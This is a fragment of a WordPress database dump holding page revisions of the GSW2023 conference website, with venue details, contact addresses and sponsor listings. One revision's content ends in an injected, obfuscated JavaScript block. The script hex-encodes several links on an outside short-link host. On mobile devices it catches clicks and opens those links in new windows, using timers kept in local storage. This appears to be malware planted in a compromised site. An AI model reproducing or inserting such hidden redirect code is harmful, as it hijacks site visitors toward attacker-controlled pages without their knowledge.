img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 02:54:09','2023-08-16 02:54:09','',3066,'https://gsw2023.com/?p=5271',0,'revision','',0),
(5272,1,'2023-08-16 02:54:32','2023-08-16 02:54:32','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692154364230{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h4>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\"][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" 